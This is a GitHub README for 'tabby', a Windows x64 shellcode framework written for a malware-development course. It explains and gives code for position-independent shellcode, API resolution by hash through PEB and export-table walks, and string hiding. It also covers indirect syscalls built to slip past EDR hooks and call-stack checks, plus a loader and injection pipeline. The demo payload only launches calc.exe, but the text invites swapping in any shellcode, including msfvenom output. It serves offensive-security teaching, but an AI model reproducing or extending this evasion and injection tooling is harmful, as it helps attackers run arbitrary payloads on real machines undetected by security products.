cocomelonc/tabby

tabby

a minimal, position-independent C shellcode micro framework for Windows x64.

compiles entirely on Linux with mingw-w64 and nasm. output is a flat raw binary (shellcode.bin) with no PE header, no imports, no CRT - ready to inject into any process.

designed for the course Malware Development for Ethical Hackers (2026).


tabby - the main concept

a position-independent C shellcode framework that compiles entirely on Linux and produces flat raw bytes that survive injection into any Windows x64 process - with EDR-evading indirect NT syscalls baked in.

the four ideas that hold it together:

write shellcode in C, not assembly. - you write a normal sc_main(PVOID base) function. the framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The asm is confined to a 20-line entry stub and 3-instruction syscall stubs generated by a macro.

no PE header, no IAT, no CRT. - output is a flat .bin blob starting at byte 0 with _start at offset 0. No imports - every Windows API is resolved at runtime by FNV-1a hash via PEB walk + EAT walk. No libc - STACKSTR builds strings on the stack so they never appear in .rdata.

indirect syscalls that look clean on the call stack. - instead of executing syscall ourselves (which leaves our shellcode as the return address - flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret gadget that already exists inside ntdll's own stub, past the EDR's inline hook. The kernel sees a return address inside ntdll.

linux-only toolchain. - mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.

the framework is small enough to read end-to-end in one sitting (~500 lines of C + ~80 lines of NASM) and every component answers a specific detection problem:

entry.asm - how does shellcode find its own base address? (RDIP)
resolve.c - how do we call Windows APIs with no IAT? (PEB + EAT walk)
pic.h - how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
stubs.asm - how do we bypass EDR hooks on ntdll? (indirect syscalls)
syscall.c - how do we get SSNs without hardcoding them? (runtime extraction)
flat.ld - how do we produce raw bytes from a normal toolchain? (linker script + objcopy)

other projects either hide these mechanics behind code generators (SysWhispers) or are too big to study (Cobalt Strike). tabby is the minimum viable framework that makes each technique inspectable.


what it is not

not a C2 or post-exploitation framework.
not a packer or crypter for existing PE files.
not a polished offensive tool - it's a teaching framework for "Malware Development for Ethical Hackers" trainings. the README documents the why of every design decision (the project structure rationale table) precisely because the goal is for the reader to understand the choices, not just run the binary.


core concepts

before using this tool, you need to understand four ideas that the whole framework is built on. Each one is a direct answer to a specific detection problem.

1. position-independent code (PIC)

a normal Windows EXE is linked against a preferred image base and relies on the PE loader to map it, apply relocations, and fill in imports. any absolute address the linker emitted for a function, global variable, or string literal is only valid after that work. If the code is simply copied somewhere else in memory and jumped into, those addresses point to garbage and the process crashes.

shellcode must work regardless of where it lands in memory. Every reference to data or other code must be relative to the current instruction pointer.

on x86-64 this is mostly natural: CALL rel32 and LEA reg, [rip+N] are both RIP-relative by design. The problems are:

strings and constants. The compiler normally puts them in .rdata at a fixed address. We merge .rdata into .text via the linker script and generate them on the stack at runtime with the STACKSTR macro.
global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. We keep them in .text too; the linker script discards .data and .bss.
_start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.

the entry stub (asm/entry.asm) uses the classic call/pop sequence (the RDIP trick) to read the instruction pointer and recover its own load address:

  call  .here
.here:
  pop   rcx                     ; rcx = runtime address of .here
  sub   rcx, (.here - _start)   ; rcx = base of shellcode

this gives sc_main() a pointer to the shellcode's own base, useful if you embed a secondary payload or config block after the code.
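
the arithmetic behind that sub instruction can be checked on the host. this is a minimal sketch, not part of the repository: it assumes .here sits 0x0C bytes after _start (as in the disassembly shown under "how to verify the output"), and recover_base and the sample load address are hypothetical names and values used only for illustration.

```python
# Offset of the .here label from _start, taken from the README listing:
# three 1-byte pushes + 4-byte sub + 5-byte call = 0x0C.
HERE_OFFSET = 0x0C


def recover_base(popped_rip: int, here_offset: int = HERE_OFFSET) -> int:
    """Mirror `sub rcx, (.here - _start)`: popped RIP minus label offset."""
    return popped_rip - here_offset


if __name__ == "__main__":
    # Hypothetical load address; any value works because the
    # subtraction is independent of where the blob was mapped.
    load_address = 0x000001A2B3C40000
    popped = load_address + HERE_OFFSET  # what `pop rcx` would yield
    print(hex(recover_base(popped)))
```

the result does not depend on the load address, which is the whole point: the offset is a link-time constant, while the popped value is whatever the CPU pushed at runtime.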

2. API resolution without imports

every Windows API call in a normal program goes through the Import Address Table. the PE loader fills the IAT at load time by doing the equivalent of LoadLibrary and GetProcAddress on your behalf. A flat shellcode blob has no IAT. we have to find APIs ourselves.

the mechanism is a walk of the Process Environment Block (PEB):

gs:[0x60]  ->  PEB
              └─ Ldr  ->  PEB_LDR_DATA
                          └─ InLoadOrderModuleList  (doubly-linked)
                              ├─ ntdll.dll
                              ├─ kernel32.dll
                              └─ ...

every loaded DLL appears in this list with its base address and name. once we have a module base we walk its export directory, referred to here as the Export Address Table (EAT): an array of name RVAs, a parallel array of name ordinals, and an array of function RVAs indexed by those ordinals. together they let us find a specific export by name.

comparing strings at runtime is noisy and leaves IOCs. We compare hashes instead. The hash function is FNV-1a 32-bit (fast, good distribution, trivial to implement without a CRT):

DWORD fnv1a(const char *s) {
  DWORD h = 0x811c9dc5;
  while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
  return h;
}

pre-computed hash constants live in include/ntapi.h. Use tools/hash.py to generate or verify them:

$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
  NtAllocateVirtualMemory  ->  0xca67b978u
  ntdll.dll                ->  0xa62a3b3bu

DLL names are matched case-insensitively (lowercased in the LDR walk). export names are case-sensitive because the EAT preserves the original casing.
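
the hashing rules above can be reproduced on the host. this is a minimal sketch and not the repository's tools/hash.py: it assumes names are hashed as ASCII bytes and that module names are lowercased first; hash_export and hash_module are hypothetical helper names.

```python
FNV_OFFSET_BASIS = 0x811C9DC5  # same seed as the C fnv1a() above
FNV_PRIME = 0x01000193


def fnv1a32(data: bytes) -> int:
    """32-bit FNV-1a: XOR each byte in, then multiply by the prime."""
    h = FNV_OFFSET_BASIS
    for byte in data:
        h ^= byte
        h = (h * FNV_PRIME) & 0xFFFFFFFF  # emulate DWORD wrap-around
    return h


def hash_export(name: str) -> int:
    """Export names keep their original casing (assumption: ASCII)."""
    return fnv1a32(name.encode("ascii"))


def hash_module(name: str) -> int:
    """Module names are lowercased before hashing (assumption: ASCII)."""
    return fnv1a32(name.lower().encode("ascii"))


if __name__ == "__main__":
    print(f"NtAllocateVirtualMemory  ->  0x{hash_export('NtAllocateVirtualMemory'):08x}u")
    print(f"ntdll.dll                ->  0x{hash_module('NTDLL.DLL'):08x}u")
```

the explicit mask matters in Python because integers do not overflow; in C the DWORD type wraps on its own.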

3. indirect syscalls

calling NtAllocateVirtualMemory from our shellcode the normal way (a call to the ntdll export) is visible to any EDR that hooks ntdll in user mode. The EDR installs an inline hook: it overwrites the first bytes of the ntdll stub with a JMP into the EDR's own code, which inspects the call before letting it proceed.

Direct syscalls bypass the hook by putting the system call number (SSN) into EAX and executing syscall ourselves:

  mov  eax, 0x18       ; SSN for NtAllocateVirtualMemory
  mov  r10, rcx        ; NT ABI: r10 must mirror rcx
  syscall

this dodges the hook, but creates a new problem: the thread call stack shows our_shellcode+N -> NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address is not inside ntdll.

indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction that already exists inside ntdll's own stub - past the hook:

ntdll!NtAllocateVirtualMemory:
  4C 8B D1        mov r10, rcx      <- hook overwrites here
  B8 18 00 00 00  mov eax, 0x18
  0F 05           syscall           <- we jump to here
  C3              ret

now the return address that the kernel sees is inside ntdll. The call stack looks clean.

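the SSN is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 opcode (0xB8) and reading the 32-bit immediate that follows. this works on a hooked stub only when the hook leaves those bytes intact, for example a patch confined to the 3-byte mov r10, rcx prologue. a 5-byte jmp rel32 written at offset 0 also covers the 0xB8 opcode and the low SSN byte, in which case the scan can fail and return (DWORD)-1: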

static DWORD extract_ssn(PBYTE stub) {
  for (int i = 0; i < 32; i++) {
    if (stub[i] == 0xB8) {
      DWORD ssn = *(DWORD *)(stub + i + 1);
      if (ssn < 0x600) return ssn;   // sanity: no NT SSN is >= 0x600
    }
  }
  return (DWORD)-1;
}

4. the toolchain: why it all runs on Linux

a Windows PE targets Windows, but building it is just translating C and assembly source into machine code, and that can happen on any host. mingw-w64 is a complete win64 cross-compiler that runs on Linux and produces native Windows COFF object files and PE executables.

the flat binary extraction step uses objcopy to peel the .text section out of the PE wrapper:

C source  ->  x86_64-w64-mingw32-gcc      ->  Win64 COFF .o
ASM       ->  nasm -f win64               ->  Win64 COFF .o
COFF .o   ->  x86_64-w64-mingw32-ld       ->  PE .elf  (single .text section)
PE .elf   ->  x86_64-w64-mingw32-objcopy  ->  shellcode.bin  (raw bytes)

nothing in this pipeline touches Windows. the output runs on Windows because the machine code is win64 ABI compliant.


repository layout

tabby/
├── include/
│   ├── types.h        windows types from scratch - no SDK, no CRT headers   
│   ├── pic.h          FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes   
│   └── ntapi.h        NT function pointer types, sc_* declarations, hash constants   
├── src/
│   ├── crt.c          sc_memcpy / sc_memset / sc_memcmp / sc_strlen   
│   ├── resolve.c      find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget   
│   └── syscall.c      SSN extraction + syscall_init()   
├── asm/
│   ├── entry.asm      _start at byte 0: RDIP -> sc_main(base)   
│   └── stubs.asm      SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)   
├── ld/
│   └── flat.ld        linker script: flatten .text and .rdata$* into single .text at offset 0   
├── example/
│   ├── exec.c         minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")   
│   └── alloc_exec.c   full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx   
└── tools/
    ├── hash.py        FNV-1a pre-computation for ntapi.h constants    
    └── loader.c       minimal Win64 test loader: maps shellcode.bin and executes it    

dependencies

install on Ubuntu / Debian:

sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64

that is all. No MSVC, no Windows SDK, no Wine.


Build

git clone https://github.com/cocomelonc/tabby
cd tabby
make

expected output:

nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c     -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin  1760 bytes

the only warning (section below image base) is expected - we intentionally place .text at virtual address 0 so the flat binary starts at byte 0.

output: bin/shellcode.bin - a raw x64 shellcode blob.

a smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:

make exec      # produces bin/exec.bin (~416 bytes)

useful for sanity-checking the framework on a new target before exercising the full NT syscall path.


how to verify the output

disassemble the first bytes on Linux to confirm _start is at offset 0:

ndisasm -b 64 bin/shellcode.bin | head -20

expected:

00000000  53                push rbx
00000001  57                push rdi
00000002  56                push rsi
00000003  4883EC20          sub rsp,byte +0x20   ; shadow space, preserves 16-byte alignment
00000007  E800000000        call 0xc
0000000C  59                pop rcx              ; <- RDIP trick
0000000D  4883E90C          sub rcx,byte +0xc    ; rcx = base of shellcode
00000011  E8XXXXXXXX        call sc_main
...
0000001E  6690              xchg ax,ax           ; padding to 0x20
00000020  0000              ssn_NtAllocateVirtualMemory  (dd 0, populated at runtime)
00000024  0000              ssn_NtWriteVirtualMemory
...
00000040  0000              g_syscall_gadget (dq 0)
00000048  8B0500000000      mov eax,[rel ssn_NtAllocateVirtualMemory]  ; <- first syscall stub

the RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery.
SSN slots and the gadget pointer live in .text (offsets 0x20–0x47) so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address.
the first syscall stub starts at 0x48.
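
the same checks can be scripted instead of read off the ndisasm output. this is a minimal sketch under stated assumptions: the expected prologue bytes are copied from the listing above and may differ for another build, the layout assumes eight 4-byte SSN slots starting at 0x20 followed by one 8-byte gadget pointer, and check_entry and data_layout are hypothetical helper names.

```python
# Prologue bytes from the README listing: push rbx/rdi/rsi, sub rsp,0x20,
# call +0, pop rcx, sub rcx,0xc. A different build may not match exactly.
EXPECTED_PROLOGUE = bytes.fromhex("53 57 56 4883EC20 E800000000 59 4883E90C")


def check_entry(blob: bytes) -> bool:
    """True if the blob starts with the expected _start prologue."""
    return blob.startswith(EXPECTED_PROLOGUE)


def data_layout(slots_start: int = 0x20, num_slots: int = 8):
    """Return (gadget_offset, first_stub_offset) for dd slots + one dq."""
    gadget = slots_start + 4 * num_slots  # eight dword SSN slots
    first_stub = gadget + 8               # one qword gadget pointer
    return gadget, first_stub


if __name__ == "__main__":
    import sys

    # Usage (path is whatever your build produced): python3 check.py bin/shellcode.bin
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print("prologue ok:", check_entry(fh.read()))
    print("gadget at 0x%02x, first stub at 0x%02x" % data_layout())
```

with the defaults, the computed offsets agree with the listing: the gadget pointer at 0x40 and the first stub at 0x48.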


running on Windows

bin/shellcode.bin is a raw byte blob - not an executable. to run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.

build the loader

on Linux, cross-compile tools/loader.c with:

make loader

this produces bin/loader.exe using mingw-w64 - no Windows required.

deploy

copy both files to the same folder on the Windows machine:

bin/shellcode.bin
bin/loader.exe

run

.\loader.exe shellcode.bin

or, to test the smaller standalone shellcode first:

.\loader.exe exec.bin

both pop calc.exe. the difference is that exec.bin calls WinExec directly (PEB walk + EAT walk only), while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory -> NtWriteVirtualMemory -> NtProtectVirtualMemory -> NtCreateThreadEx) with exec.bin's bytes as the embedded payload.

if exec.bin pops calc but shellcode.bin does not, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) - not the framework basics.

what the loader does

fopen("shellcode.bin", "rb")          // reads the raw bytes
VirtualAlloc(NULL, sz, RW)            // allocates a private RW region
fread -> buf                           // copies shellcode in
VirtualProtect(buf, sz, RWX)          // flips the region to execute-read-write
CreateThread(buf)                     // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle             // cleans up

the region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode's own .text section at runtime. without write access the first store would #AV and the thread would terminate silently.

the loader prints the load address before jumping so you can attach a debugger at the right offset if needed:

[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000

the bundled example payload (example/alloc_exec.c) spawns calc.exe:

  1. allocates a fresh RW region via NtAllocateVirtualMemory (indirect syscall)
  2. writes an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled output: PEB walk -> WinExec("calc.exe"))
  3. flips the region to RWX via NtProtectVirtualMemory
  4. spawns a thread on it via NtCreateThreadEx
  5. waits for the thread, closes the handle, frees the region

swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.


writing your own shellcode

  1. copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
  2. write a sc_main(PVOID base) function. If you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode, useful if you embed config or a secondary payload after the code.
  3. add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
  4. run make (or make exec for a variant that excludes the syscall stubs entirely).

using the PEB resolver

PVOID ntdll    = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);

to resolve any export by name:

typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);

or with the GETAPI macro:

HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);

using the indirect syscalls

after syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:

PVOID  region = NULL;
SIZE_T size   = 4096;

NTSTATUS st = sc_NtAllocateVirtualMemory(
    (HANDLE)-1,               // current process 
    &region,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);

if (!NT_SUCCESS(st)) { /* handle error */ }

available stubs:

| function | args | notes |
| --- | --- | --- |
| sc_NtAllocateVirtualMemory | 6 | allocate memory in a process |
| sc_NtWriteVirtualMemory | 5 | write across process boundary |
| sc_NtProtectVirtualMemory | 5 | change page protection |
| sc_NtFreeVirtualMemory | 4 | release allocation |
| sc_NtCreateThreadEx | 11 | spawn thread in local or remote process |
| sc_NtWaitForSingleObject | 3 | wait on a handle |
| sc_NtClose | 1 | close a handle |
| sc_NtTerminateProcess | 2 | terminate a process |

strings - never in .rdata

do not write:

const char *msg = "hello";   // ends up in .rdata -> fixed address -> crash

Use STACKSTR instead:

STACKSTR(msg, "hello");      // pushed onto the stack character by character

adding a new NT syscall stub

step 1 - add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):

global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0

STUB NtOpenProcess, ssn_NtOpenProcess

the STUB macro is a single, ABI-clean stub - no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.

step 2 - declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:

extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);

step 3 - add the hash constant to include/ntapi.h:

#define H_NtOpenProcess  0xXXXXXXXXu

compute it:

python3 tools/hash.py NtOpenProcess

step 4 - declare the prototype in include/ntapi.h:

NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);

how indirect syscall dispatch works (step by step)

take sc_NtAllocateVirtualMemory as the example. the caller in C is:

sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);

win64 calling convention maps this to:

RCX  = (HANDLE)-1
RDX  = &region
R8   = 0
R9   = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE    <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE            <- 6th arg on stack

inside the stub:

sc_NtAllocateVirtualMemory:
    mov  eax, dword [rel ssn_NtAllocateVirtualMemory]  ; EAX <- SSN
    mov  r10, rcx                                       ; R10 <- RCX  (NT ABI)
    jmp  qword [rel g_syscall_gadget]

three instructions. that's it. the stub does not touch the stack, does not shift arguments, and does not modify RSP. the Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], ... and the kernel reads them from those exact offsets after syscall. nothing extra to do.

at the point of JMP, the register and stack state is:

EAX  = SSN
R10  = (HANDLE)-1                    <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX  = &region                       <- arg 2
R8   = 0                             <- arg 3
R9   = &size                         <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE  <- arg 5
[RSP+0x30] = PAGE_READWRITE          <- arg 6

the JMP lands at the syscall; ret bytes inside ntdll's own NtAllocateVirtualMemory stub, past any EDR hook. The syscall instruction executes from ntdll, and when the kernel returns, execution resumes at the ret that follows it, which pops the return address pushed by our C caller and returns there. The instruction pointer recorded for the syscall is therefore inside ntdll, not inside our shellcode.


replacing the payload

the example/alloc_exec.c demo ships with the compiled bytes of example/exec.c (PEB walk -> WinExec("calc.exe")) as PAYLOAD[]. To use your own:

static const BYTE PAYLOAD[] = {
  // paste your x64 shellcode bytes here
  0x48, 0x31, 0xc0, ...
};

regenerate the bytes from a fresh make exec build:

make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('  ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"

or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array.
the framework handles allocation, write, protection flip, and thread creation - you only need to provide the bytes.


project structure rationale

| decision | reason |
| --- | --- |
| -nostdlib -nostdinc -ffreestanding | zero CRT dependency; everything in the binary came from our own source |
| -fno-builtin | prevents GCC emitting implicit memcpy/memset calls to CRT |
| -mno-red-zone | Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame |
| -mcmodel=small | critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV |
| -fno-asynchronous-unwind-tables | suppresses .eh_frame generation; we discard it anyway but this avoids linker noise |
| -ffunction-sections -fdata-sections + ld --gc-sections | dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what's actually called |
| -Os | size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls |
| nasm -f win64 | produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation |
| SSN slots in .text (via NASM dd 0) | mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM's .text section guarantees they survive objcopy --only-section=.text and the stubs' [rel ssn_*] displacements resolve correctly |
| linker script at . = 0 + .rdata$* .text$* merged into .text | lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections |
| entry stub sub rsp, 0x20 (not 0x28) | after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise an aligned SSE access such as MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) faults with #GP, which Windows reports as an access violation, and the thread dies silently |
| FNV-1a over CRC32 | equally fast, no special instructions required, fits in 6 lines of C |
| per-function SSN slots | avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects |
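
the stack-alignment reasoning for the entry stub can be traced with a few lines of arithmetic. this is a minimal sketch, assuming the thread enters _start with RSP mod 16 = 8 (as if it had been called) and that the stub performs three pushes, one sub, the call/pop pair, and the final call to sc_main; rsp_mod16_at_sc_main is a hypothetical helper name.

```python
def rsp_mod16_at_sc_main(frame_size: int, entry_mod16: int = 8, pushes: int = 3) -> int:
    """Track RSP modulo 16 through the entry stub up to sc_main's first instruction."""
    rsp = entry_mod16
    rsp -= 8 * pushes   # push rbx / push rdi / push rsi
    rsp -= frame_size   # sub rsp, frame_size (shadow space)
    rsp -= 8            # call .here pushes a return address
    rsp += 8            # pop rcx removes it again
    rsp -= 8            # call sc_main pushes its return address
    return rsp % 16


if __name__ == "__main__":
    for size in (0x20, 0x28):
        print(f"sub rsp, {size:#x} -> RSP mod 16 at sc_main entry = {rsp_mod16_at_sc_main(size)}")
```

a result of 8 is what the Win64 ABI expects at function entry; a result of 0 means every callee sees a stack that is off by 8 bytes.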

attention

this tool is a proof of concept for educational purposes only. the author takes no responsibility for any damage caused by misuse.

license

MIT
